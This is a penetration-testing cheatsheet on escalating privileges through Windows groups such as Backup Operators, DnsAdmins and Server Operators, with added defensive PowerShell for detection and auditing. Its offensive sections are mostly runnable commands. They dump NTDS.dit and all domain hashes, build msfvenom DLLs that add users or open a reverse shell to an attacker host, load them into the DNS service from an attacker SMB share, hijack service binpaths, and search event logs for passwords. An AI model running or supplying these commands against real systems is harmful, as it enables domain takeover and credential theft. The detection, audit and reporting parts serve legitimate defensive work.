🛡️ Methodology Checklist
- Check group membership: whoami /groups
- Backup Operators → SeBackupPrivilegeCmdLets or diskshadow VSS → dump SAM/NTDS
- DnsAdmins → dnscmd /serverlevelplugindll → reconnect for elevated token (TOKEN TRAP)
- Event Log Readers → wevtutil qe Security /c:1000 /rd:true /f:text | findstr /i "pass"
- Server Operators → sc config [svc] binpath= "[payload]" → restart service
- Print Operators → SeLoadDriverPrivilege → load vulnerable driver
🎯 Operational Context
Use when: User is member of Backup Operators, Server Operators, DnsAdmins, Print Operators, or other sensitive Windows groups — each has a specific escalation path.
Think Dumber First: whoami /groups — look for Backup Operators, Server Operators, DnsAdmins, Event Log Readers, Print Operators. DnsAdmins = DLL injection into DNS service = SYSTEM. Backup Operators = read NTDS.dit via VSS = all domain hashes.
Skip when: User is only in standard Domain Users and local Users — no group-based escalation.
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
| whoami /groups | Check group memberships |
| net localgroup "Backup Operators" | Confirm Backup Operators membership |
| Import-Module .\SeBackupPrivilegeUtils.dll | Load SeBackupPrivilege helper DLL |
| Copy-FileSeBackupPrivilege C:\Windows\NTDS\ntds.dit C:\temp\ntds.dit | Copy NTDS.dit using backup privilege |
| robocopy /B C:\Windows\NTDS\ C:\temp\ ntds.dit | Alternative NTDS copy using backup flag |
| diskshadow /s C:\temp\diskshadow.dsc | Create VSS shadow copy of C: to extract NTDS.dit |
| reg save HKLM\SYSTEM C:\temp\SYSTEM | Save SYSTEM hive for NTDS.dit decryption |
| impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL | Extract all domain hashes from NTDS + SYSTEM |
| dnscmd [DC_NAME] /config /serverlevelplugindll \\[LHOST]\share\evil.dll | DnsAdmins → load malicious DLL into DNS service |
| sc.exe stop dns && sc.exe start dns | Restart DNS service to trigger malicious DLL load |
| msfvenom -p windows/x64/exec cmd='net user [USER] [PASS] /add /domain' -f dll -o evil.dll | Create DLL payload for DnsAdmins attack |
| net group "Event Log Readers" /domain | Check Event Log Readers group |
| wevtutil qe Security /rd:true /f:text \| findstr /i "pass" | Event Log Readers → search security log for passwords |
| Get-WinEvent -LogName Security \| where {$_.Message -like '*password*'} | PowerShell security log credential search |
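The command strings in the table above are exactly what a defender should be hunting for in process-creation telemetry. The following PowerShell is an added example, not part of the original cheatsheet: it pulls Security event 4688 records, flattens the EventData fields by name, and flags command lines that match the techniques on this page. It assumes "Audit Process Creation" with "Include command line in process creation events" is enabled (otherwise the CommandLine field is empty); the indicator names and regular expressions are this example's own.

```powershell
# Added example (not from the original cheatsheet): hunt Security 4688 events for the
# command lines this page lists. Assumes Audit Process Creation plus command-line
# logging are enabled; without the latter the CommandLine field is empty.

$Indicators = @(
    @{ Name = 'Backup Operators: shadow copy / NTDS copy'
       Pattern = 'diskshadow(\.exe)?\s|robocopy.*\s/B\s|ntds\.dit|Copy-FileSeBackupPrivilege' }
    @{ Name = 'Backup Operators: SYSTEM hive export'
       Pattern = 'reg(\.exe)?\s+save\s+HKLM\\SYSTEM' }
    @{ Name = 'DnsAdmins: DNS plugin DLL'
       Pattern = 'serverlevelplugindll' }
    @{ Name = 'Server Operators: service binPath change'
       Pattern = 'sc(\.exe)?\s+config\s+\S+\s+binpath=' }
    @{ Name = 'Event Log Readers: Security log credential search'
       Pattern = 'wevtutil\s+qe\s+Security' }
)

# Pull 4688 events and flatten EventData by field name (more robust than Properties[n] indexes).
function Get-ProcessCreationEvents {
    param([int]$Hours = 24, [string]$ComputerName = $env:COMPUTERNAME)
    $filter = @{ LogName = 'Security'; Id = 4688; StartTime = (Get-Date).AddHours(-$Hours) }
    Get-WinEvent -ComputerName $ComputerName -FilterHashtable $filter -ErrorAction SilentlyContinue |
        ForEach-Object {
            [xml]$x = $_.ToXml()
            $d = @{}
            foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
            [pscustomobject]@{
                Time        = $_.TimeCreated
                Computer    = $_.MachineName
                User        = "$($d.SubjectDomainName)\$($d.SubjectUserName)"
                Process     = $d.NewProcessName
                Parent      = $d.ParentProcessName
                CommandLine = $d.CommandLine
            }
        }
}

# Match each record's command line against the indicator list; one row per hit.
function Find-GroupAbuseIndicators {
    param([Parameter(ValueFromPipeline)]$Record)
    process {
        foreach ($i in $Indicators) {
            if ($Record.CommandLine -and $Record.CommandLine -match $i.Pattern) {
                [pscustomobject]@{
                    Time = $Record.Time; Computer = $Record.Computer; User = $Record.User
                    Indicator = $i.Name; CommandLine = $Record.CommandLine; Parent = $Record.Parent
                }
            }
        }
    }
}

# Usage: last 24 hours on this host (run on the DC, or point -ComputerName at it).
Get-ProcessCreationEvents -Hours 24 | Find-GroupAbuseIndicators | Format-Table -AutoSize -Wrap
```

The Event Log Readers pattern will also catch routine administration, so treat it as context for the other hits rather than an alert on its own; the diskshadow, serverlevelplugindll and binpath= patterns are rare enough in normal operations to page on directly.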
🔬 Deep Dive & Workflow
Backup Operators → Domain Hash Dump
Method 1: SeBackupPrivilege DLL
```powershell
# Load helpers
Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
# Enable privilege
Set-SeBackupPrivilege
# Copy NTDS.dit (DC only — domain database)
Copy-FileSeBackupPrivilege C:\Windows\NTDS\ntds.dit C:\temp\ntds.dit -Overwrite
# Save SYSTEM hive (contains boot key for NTDS decryption)
reg save HKLM\SYSTEM C:\temp\SYSTEM
```
Method 2: diskshadow (Volume Shadow Copy)
```powershell
# Create script file (PowerShell here-string; diskshadow reads it with /s)
@'
set verbose on
set metadata C:\temp\meta.cab
set context clientaccessible
begin backup
add volume C: alias cdrive
create
expose %cdrive% E:
end backup
'@ | Set-Content -Path C:\temp\diskshadow.dsc -Encoding ASCII
diskshadow /s C:\temp\diskshadow.dsc
# → Exposes shadow copy as E: drive
Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit C:\temp\ntds.dit -Overwrite
reg save HKLM\SYSTEM C:\temp\SYSTEM
```
Extraction (on attacker):
```bash
# Transfer ntds.dit and SYSTEM to Kali
impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL
# → Dumps all NTLM hashes for all domain accounts
# → Pass-the-Hash with admin hash → Domain takeover
```
DnsAdmins → SYSTEM on DC
CRITICAL TOKEN TRAP: After loading the DLL, you need to reconnect your session. The elevated token only applies to NEW connections — your current shell still has the old token.
```bash
# Step 1: Generate DLL payload (on attacker)
msfvenom -p windows/x64/exec cmd='net user [USER] [PASS] /add /domain' -f dll -o evil.dll
# Or reverse shell DLL:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=[LHOST] LPORT=[LPORT] -f dll -o evil.dll
# Step 2: Host DLL on SMB share
impacket-smbserver share . -smb2support
```
```powershell
# Step 3: DnsAdmins member configures DNS plugin DLL (on the target)
dnscmd [DC_HOSTNAME] /config /serverlevelplugindll \\[LHOST]\share\evil.dll
# Step 4: Restart DNS (requires DnsAdmins membership)
sc.exe stop dns
sc.exe start dns
# → DNS service runs as SYSTEM → loads our DLL → payload executes as SYSTEM
# TOKEN TRAP FIX: Don't use current shell for post-exploitation
# If payload added user → log in fresh → new session has correct token
```
Cleanup:
```powershell
# Remove malicious DLL config after exploitation
sc.exe stop dns
reg delete HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters /v ServerLevelPluginDll /f
sc.exe start dns
```
Event Log Readers → Credential Hunt
```powershell
# Search for commands that carry passwords: 4688 process creation (Security log, needs
# command-line logging) and 4104 script block logging (Microsoft-Windows-PowerShell/Operational)
wevtutil qe Security /rd:true /f:text | findstr /i "pass"
wevtutil qe Microsoft-Windows-PowerShell/Operational /rd:true /f:text | findstr /i "pass"
# PowerShell equivalent
Get-WinEvent -LogName Security | Where-Object {$_.Message -like '*password*'} | Select -ExpandProperty Message
```
Print Operators → SeLoadDriverPrivilege → SYSTEM
```text
# Print Operators get SeLoadDriverPrivilege
# → Load a malicious kernel driver (Capcom.sys or similar)
# → Requires: EnableSeLoadDriverPrivilege.cpp PoC + Capcom IOCTL exploit
# High complexity — prefer other vectors if available
```
Server Operators → Service Manipulation
```powershell
# Server Operators can start/stop services and modify some service configs
# Target: modify binpath of a service running as SYSTEM
sc.exe qc [SERVICE_NAME] # check current config
sc.exe config [SERVICE_NAME] binpath= "cmd.exe /c net user [USER] [PASS] /add"
sc.exe stop [SERVICE_NAME]
sc.exe start [SERVICE_NAME]
# → cmd runs as SYSTEM → adds user
# Restore (or service crashes are fine for CTF)
sc.exe config [SERVICE_NAME] binpath= "C:\original\path.exe"
```
🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| DnsAdmins DLL injection fails | Need DNS service restart | Inject DLL: dnscmd /config /serverlevelplugindll \\[LHOST]\share\dns.dll; requires DNS restart via Server Operator or admin |
| Backup Operators VSS access blocked | Privilege not fully activated | Token may need activation; use SeBackupPrivilege PowerShell module to activate token |
| Print Operators shell fails | Modern Windows mitigated | Print Operators loading DLL into spooler is largely mitigated post-CVE-2021-1675; try alternative |
| Event Log Readers interesting but not privesc | Read-only log access | Use for credential hunting in event logs: wevtutil qe Security /f:text \| findstr /i password |
| Server Operators service modify fails | UAC or protected service | Try: sc config [SVC] binpath= "cmd.exe /c net user admin Pass@123 /add"; restart service |
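The DnsAdmins rows above and the Cleanup step in the Deep Dive both hinge on one registry value, ServerLevelPluginDll under HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters. The following PowerShell is an added example, not part of the original cheatsheet: it audits that value on a DNS server and grades what it finds, then offers a remediation helper that mirrors the page's cleanup (remove the value, restart DNS). It assumes local administrator rights on the DC; the severity labels are this example's own convention, and the signature check relies on Get-AuthenticodeSignature trusting the host's certificate stores.

```powershell
# Added example (not from the original cheatsheet): audit a DNS server for the
# ServerLevelPluginDll value that the DnsAdmins technique sets. Run on each DC/DNS
# server with local admin rights. Severity labels are this example's own convention.

$DnsParams = 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters'

function Get-DnsPluginDllStatus {
    param([string]$KeyPath = $DnsParams)

    # Absent on a clean server; Get-ItemProperty returns nothing when the value is missing.
    $item  = Get-ItemProperty -Path $KeyPath -Name ServerLevelPluginDll -ErrorAction SilentlyContinue
    $value = if ($item) { [string]$item.ServerLevelPluginDll } else { '' }

    if ([string]::IsNullOrWhiteSpace($value)) {
        return [pscustomobject]@{ Configured = $false; PluginDll = $null; Severity = 'none'
                                  Reason = 'ServerLevelPluginDll is not set (expected state)' }
    }

    if ($value -match '^\\\\') {
        # The DNS service runs as SYSTEM and would load this DLL from another host.
        $sev = 'critical'; $why = 'plugin DLL is a UNC path'
    }
    elseif (-not (Test-Path -LiteralPath $value)) {
        $sev = 'high'; $why = 'plugin DLL path does not exist locally (stale or unreachable)'
    }
    else {
        $sig = Get-AuthenticodeSignature -FilePath $value
        if ($sig.Status -ne 'Valid') {
            $sev = 'high'; $why = "plugin DLL signature status: $($sig.Status)"
        }
        elseif ($value -notmatch '^[A-Za-z]:\\Windows\\System32\\') {
            $sev = 'medium'; $why = "signed by $($sig.SignerCertificate.Subject) but outside System32"
        }
        else {
            $sev = 'review'; $why = "signed by $($sig.SignerCertificate.Subject); confirm it is an approved plugin"
        }
    }
    [pscustomobject]@{ Configured = $true; PluginDll = $value; Severity = $sev; Reason = $why }
}

# Remediation: remove the value and restart DNS so the service stops loading the plugin.
function Clear-DnsPluginDll {
    param([string]$KeyPath = $DnsParams)
    Remove-ItemProperty -Path $KeyPath -Name ServerLevelPluginDll -ErrorAction SilentlyContinue
    Restart-Service -Name DNS
}

Get-DnsPluginDllStatus | Format-List
```

Because the DNS service only reads the value at start, a finding of 'critical' or 'high' means either the DLL is already loaded or it will be on the next restart; clear it before restarting, and check the 4688 record for the dnscmd call to find who set it.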
📝 Reporting Trigger
Finding Title: Privileged Group Membership Enables Windows Privilege Escalation
Impact: Membership in DnsAdmins, Backup Operators, or Server Operators provides indirect but equivalent-to-admin access through DLL injection into DNS, VSS access to credential databases, or service binary modification.
Root Cause: Users added to privileged Windows groups for operational convenience without security review of the implied escalation paths.
Recommendation: Treat DnsAdmins, Backup Operators, Print Operators, and Server Operators as Tier 0 sensitive groups. Audit and remove unnecessary memberships. Implement JIT access for privileged group membership. Alert on sensitive group membership changes via Windows Event ID 4728.
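The recommendation above (audit memberships, alert on changes) can be put into practice with the following PowerShell, an added example that is not part of the original cheatsheet. It enumerates the page's sensitive groups with nested membership expanded, then reads the DC's Security log for member-add events. It queries 4728 as the page recommends and also 4732 and 4756, because Backup Operators, Server Operators, Print Operators and Event Log Readers are built-in domain-local groups and DnsAdmins is domain-local too, so additions to them are logged as 4732 (4756 covers universal groups). It assumes the ActiveDirectory RSAT module and rights to read the DC Security log; the group list is the page's, and the DC defaults to whichever one the session discovers.

```powershell
# Added example (not from the original cheatsheet): audit and monitor the sensitive
# groups this page covers. Assumes the ActiveDirectory RSAT module and rights to read
# the DC Security log. Group list is taken from the page.

Import-Module ActiveDirectory -ErrorAction Stop

$SensitiveGroups = 'Backup Operators', 'Server Operators', 'DnsAdmins',
                   'Print Operators', 'Event Log Readers'

# Current membership, expanded through nested groups, so nesting does not hide members.
function Get-SensitiveGroupMembers {
    param([string[]]$Groups = $SensitiveGroups)
    foreach ($g in $Groups) {
        Get-ADGroupMember -Identity $g -Recursive -ErrorAction SilentlyContinue |
            ForEach-Object {
                [pscustomobject]@{ Group = $g; Member = $_.SamAccountName
                                   Class = $_.objectClass; DN = $_.distinguishedName }
            }
    }
}

# Member-add events: 4728 = global group, 4732 = domain-local group (the built-in groups
# above and DnsAdmins are domain-local), 4756 = universal group.
function Get-SensitiveGroupAdditions {
    param([string[]]$Groups = $SensitiveGroups, [int]$Days = 7,
          [string]$DomainController = (Get-ADDomainController).HostName)
    $filter = @{ LogName = 'Security'; Id = 4728, 4732, 4756; StartTime = (Get-Date).AddDays(-$Days) }
    Get-WinEvent -ComputerName $DomainController -FilterHashtable $filter -ErrorAction SilentlyContinue |
        ForEach-Object {
            # Flatten EventData by field name: TargetUserName is the group, MemberName the added principal.
            [xml]$x = $_.ToXml()
            $d = @{}
            foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
            if ($Groups -contains $d.TargetUserName) {
                [pscustomobject]@{ Time = $_.TimeCreated; EventId = $_.Id; Group = $d.TargetUserName
                                   Member = $d.MemberName
                                   AddedBy = "$($d.SubjectDomainName)\$($d.SubjectUserName)" }
            }
        }
}

Get-SensitiveGroupMembers   | Format-Table -AutoSize
Get-SensitiveGroupAdditions | Format-Table -AutoSize -Wrap
```

Run the membership function on a schedule and diff its output against the approved list; feed the additions function into the SIEM rule so that any row whose Group is one of these five pages the on-call engineer, with AddedBy as the first pivot for the investigation.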